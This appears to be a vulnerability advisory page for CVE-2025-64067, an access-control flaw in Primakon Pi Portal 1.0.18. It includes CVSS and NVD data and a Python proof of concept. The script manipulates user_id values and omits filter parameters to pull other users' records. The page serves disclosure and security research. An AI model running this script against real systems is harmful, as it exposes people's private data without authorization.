Security Vulnerability Report
中文
CVE-2025-64067 CVSS 5.3 MEDIUM

CVE-2025-64067

Published: 2025-11-25 19:15:51
Last Modified: 2025-12-01 14:22:53
Source: [email protected]

Description

Primakon Pi Portal 1.0.18 API endpoints responsible for retrieving object-specific or filtered data (e.g., user profiles, project records) fail to implement sufficient server-side validation to confirm that the requesting user is authorized to access the requested object or dataset. This vulnerability can be exploited in two ways: Direct ID manipulation and IDOR, by changing an ID parameter (e.g., user_id, project_id) in the request, an attacker can access the object and data belonging to another user; and filter Omission, by omitting the filtering parameter entirely, an attacker can cause the endpoint to return an entire unfiltered dataset of all stored records for all users. This flaw leads to the unauthorized exposure of sensitive personal and organizational information.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:primakon:project_contract_management:1.0.18:*:*:*:*:*:*:* - VULNERABLE
Primakon Pi Portal 1.0.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-64067 PoC - IDOR in Primakon Pi Portal 1.0.18 # Target: Primakon Pi Portal API endpoints # Vulnerability: Insecure Direct Object Reference (IDOR) TARGET_URL = "http://target-server.com/api" VULN_ENDPOINT = "/api/user/profile" # PoC 1: Direct ID Manipulation def exploit_direct_id_manipulation(): """ Exploit by changing user_id parameter to access other users' data """ print("[*] Testing Direct ID Manipulation...") # Original request (legitimate user with ID 1) original_payload = {"user_id": 1} # Attacker changes user_id to target user (e.g., ID 100) manipulated_payload = {"user_id": 100} headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } # Send request with manipulated ID response = requests.get( f"{TARGET_URL}{VULN_ENDPOINT}", params=manipulated_payload, headers=headers, timeout=10 ) if response.status_code == 200: print("[+] Successfully accessed user data via ID manipulation") print(f"[+] Response: {response.text}") return response.json() else: print(f"[-] Request failed with status: {response.status_code}") return None # PoC 2: Filter Omission Attack def exploit_filter_omission(): """ Exploit by omitting filter parameters to retrieve all records """ print("[*] Testing Filter Omission Attack...") headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } # Request without any filter parameter response = requests.get( f"{TARGET_URL}/api/projects/list", headers=headers, timeout=10 ) if response.status_code == 200: data = response.json() if isinstance(data, list) and len(data) > 1: print(f"[+] Successfully retrieved unfiltered dataset") print(f"[+] Total records: {len(data)}") print(f"[+] Sample data: {json.dumps(data[:2], indent=2)}") return data else: print("[-] Unexpected response format") return None else: print(f"[-] Request failed with status: {response.status_code}") return None if __name__ == "__main__": print("=" * 60) print("CVE-2025-64067 PoC - Primakon Pi Portal IDOR") print("=" * 60) # Test both exploitation techniques exploit_direct_id_manipulation() print() exploit_filter_omission()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64067", "sourceIdentifier": "[email protected]", "published": "2025-11-25T19:15:50.907", "lastModified": "2025-12-01T14:22:52.993", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Primakon Pi Portal 1.0.18 API endpoints responsible for retrieving object-specific or filtered data (e.g., user profiles, project records) fail to implement sufficient server-side validation to confirm that the requesting user is authorized to access the requested object or dataset. This vulnerability can be exploited in two ways: Direct ID manipulation and IDOR, by changing an ID parameter (e.g., user_id, project_id) in the request, an attacker can access the object and data belonging to another user; and filter Omission, by omitting the filtering parameter entirely, an attacker can cause the endpoint to return an entire unfiltered dataset of all stored records for all users. This flaw leads to the unauthorized exposure of sensitive personal and organizational information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:primakon:project_contract_management:1.0.18:*:*:*:*:*:*:*", "matchCriteriaId": "48EDD273-2C46-43C9-9473-27D2C14040CB"}]}]}], "references": [{"url": "https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64067.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.primakon.com/rjesenja/primakon-pcm/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.